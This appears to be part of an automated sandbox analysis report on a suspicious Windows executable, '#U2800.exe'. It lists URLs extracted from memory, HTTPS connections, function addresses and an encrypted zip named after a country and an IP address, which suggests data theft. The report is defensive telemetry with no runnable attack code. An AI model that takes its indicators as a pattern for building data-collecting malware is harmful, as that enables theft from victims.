      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://maps.google.com/maps?hl=en&tab=wl
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427A39000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/X
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see12https://urn.to/r/sds_see2
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerify
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/?tab=wj
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/&ec=GAZAAQ
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/wB
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/json
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
      Source: #U2800.exeString found in binary or memory: https://www.sqlite.org/rescode.html
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49779 version: TLS 1.2

      System Summary

      barindex
      Source: Backup_[United States]_8.46.123.189_[1401].zip.0.drZip Entry: encrypted
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB814FE00_2_00007FFDFB814FE0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7DDF400_2_00007FFDFB7DDF40
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7D62100_2_00007FFDFB7D6210
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7D25700_2_00007FFDFB7D2570
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7BF5D00_2_00007FFDFB7BF5D0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7245100_2_00007FFDFB724510
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB722BE00_2_00007FFDFB722BE0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB728BF00_2_00007FFDFB728BF0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7F7C200_2_00007FFDFB7F7C20
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB758B600_2_00007FFDFB758B60
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB72FBB00_2_00007FFDFB72FBB0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB75FBD00_2_00007FFDFB75FBD0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB72AAE60_2_00007FFDFB72AAE6
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB754B200_2_00007FFDFB754B20
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7B0A600_2_00007FFDFB7B0A60
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB752A900_2_00007FFDFB752A90
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7B9AB00_2_00007FFDFB7B9AB0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB747A000_2_00007FFDFB747A00
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7FFA100_2_00007FFDFB7FFA10
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB797A300_2_00007FFDFB797A30
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7D7A300_2_00007FFDFB7D7A30
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7A89800_2_00007FFDFB7A8980
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7769D00_2_00007FFDFB7769D0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7569120_2_00007FFDFB756912
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB72B9300_2_00007FFDFB72B930
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7CD9400_2_00007FFDFB7CD940
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB75A8A00_2_00007FFDFB75A8A0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7D58B00_2_00007FFDFB7D58B0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7300100_2_00007FFDFB730010
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7F20500_2_00007FFDFB7F2050
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7C3F880_2_00007FFDFB7C3F88
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB808F800_2_00007FFDFB808F80
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB782FD00_2_00007FFDFB782FD0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB775EE00_2_00007FFDFB775EE0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB758EF00_2_00007FFDFB758EF0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB79FEF00_2_00007FFDFB79FEF0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB79CF200_2_00007FFDFB79CF20
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74AE900_2_00007FFDFB74AE90
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB76AEA00_2_00007FFDFB76AEA0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74BE100_2_00007FFDFB74BE10
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB778E200_2_00007FFDFB778E20
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB856E300_2_00007FFDFB856E30
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB793D700_2_00007FFDFB793D70
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7BCD820_2_00007FFDFB7BCD82
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB77FDB00_2_00007FFDFB77FDB0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7BCDCA0_2_00007FFDFB7BCDCA
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB849DC00_2_00007FFDFB849DC0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB784CE00_2_00007FFDFB784CE0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7BCD0F0_2_00007FFDFB7BCD0F
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7D4C900_2_00007FFDFB7D4C90
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7C7CB00_2_00007FFDFB7C7CB0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7F0CB00_2_00007FFDFB7F0CB0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74DCD00_2_00007FFDFB74DCD0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7FACD00_2_00007FFDFB7FACD0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB76E3E00_2_00007FFDFB76E3E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74C3E00_2_00007FFDFB74C3E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7E83E00_2_00007FFDFB7E83E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB83B4300_2_00007FFDFB83B430
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8664300_2_00007FFDFB866430
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB76F4400_2_00007FFDFB76F440
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB82D4400_2_00007FFDFB82D440
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7554500_2_00007FFDFB755450
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB77D3800_2_00007FFDFB77D380
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB79C3800_2_00007FFDFB79C380
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7903900_2_00007FFDFB790390
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB80E3B00_2_00007FFDFB80E3B0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB81C3A00_2_00007FFDFB81C3A0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB87F3A80_2_00007FFDFB87F3A8
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7303D00_2_00007FFDFB7303D0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7943D00_2_00007FFDFB7943D0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8002E00_2_00007FFDFB8002E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7453230_2_00007FFDFB745323
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8013200_2_00007FFDFB801320
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7A63400_2_00007FFDFB7A6340
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7432600_2_00007FFDFB743260
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB78E1E00_2_00007FFDFB78E1E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7611F00_2_00007FFDFB7611F0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8612100_2_00007FFDFB861210
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7502100_2_00007FFDFB750210
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7AC2200_2_00007FFDFB7AC220
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7F017B0_2_00007FFDFB7F017B
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7FD1900_2_00007FFDFB7FD190
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7381A00_2_00007FFDFB7381A0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7801C00_2_00007FFDFB7801C0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8060E00_2_00007FFDFB8060E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB77C1000_2_00007FFDFB77C100
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7691200_2_00007FFDFB769120
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7641300_2_00007FFDFB764130
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7B41400_2_00007FFDFB7B4140
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7270B00_2_00007FFDFB7270B0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB82D0D00_2_00007FFDFB82D0D0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7900D00_2_00007FFDFB7900D0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8157F00_2_00007FFDFB8157F0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74A7F00_2_00007FFDFB74A7F0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74D7F00_2_00007FFDFB74D7F0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7997F00_2_00007FFDFB7997F0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB76E8100_2_00007FFDFB76E810
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7F58100_2_00007FFDFB7F5810
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7DD8100_2_00007FFDFB7DD810
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8588300_2_00007FFDFB858830
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB76D8300_2_00007FFDFB76D830
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB78B7600_2_00007FFDFB78B760
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7AE7700_2_00007FFDFB7AE770
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7E47700_2_00007FFDFB7E4770
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB77A7A00_2_00007FFDFB77A7A0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB80B7D00_2_00007FFDFB80B7D0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7AD6E00_2_00007FFDFB7AD6E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7A36E00_2_00007FFDFB7A36E0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB72A7460_2_00007FFDFB72A746
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7676600_2_00007FFDFB767660
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7AB6600_2_00007FFDFB7AB660
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7E66900_2_00007FFDFB7E6690
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8386B00_2_00007FFDFB8386B0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7896B00_2_00007FFDFB7896B0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7DB6B00_2_00007FFDFB7DB6B0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7946C00_2_00007FFDFB7946C0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8065F00_2_00007FFDFB8065F0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB72A6100_2_00007FFDFB72A610
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7C36120_2_00007FFDFB7C3612
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7456240_2_00007FFDFB745624
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7E36300_2_00007FFDFB7E3630
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB78C6500_2_00007FFDFB78C650
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7645700_2_00007FFDFB764570
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7885700_2_00007FFDFB788570
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74F5A00_2_00007FFDFB74F5A0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7925A00_2_00007FFDFB7925A0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8505100_2_00007FFDFB850510
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7215300_2_00007FFDFB721530
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB74A5300_2_00007FFDFB74A530
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8515400_2_00007FFDFB851540
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7D94700_2_00007FFDFB7D9470
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB8594900_2_00007FFDFB859490
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7FE4A00_2_00007FFDFB7FE4A0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB7E24B00_2_00007FFDFB7E24B0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: String function: 00007FFDFB7E8EA0 appears 206 times
      Source: C:\Users\user\Desktop\#U2800.exeCode function: String function: 00007FFDFB811F90 appears 31 times
      Source: C:\Users\user\Desktop\#U2800.exeCode function: String function: 00007FFDFB734970 appears 110 times
      Source: C:\Users\user\Desktop\#U2800.exeCode function: String function: 00007FFDFB748730 appears 306 times
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEntityFramework.dllV vs #U2800.exe
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1985111803.00007FF734685000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoke.dll@ vs #U2800.exe
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs #U2800.exe
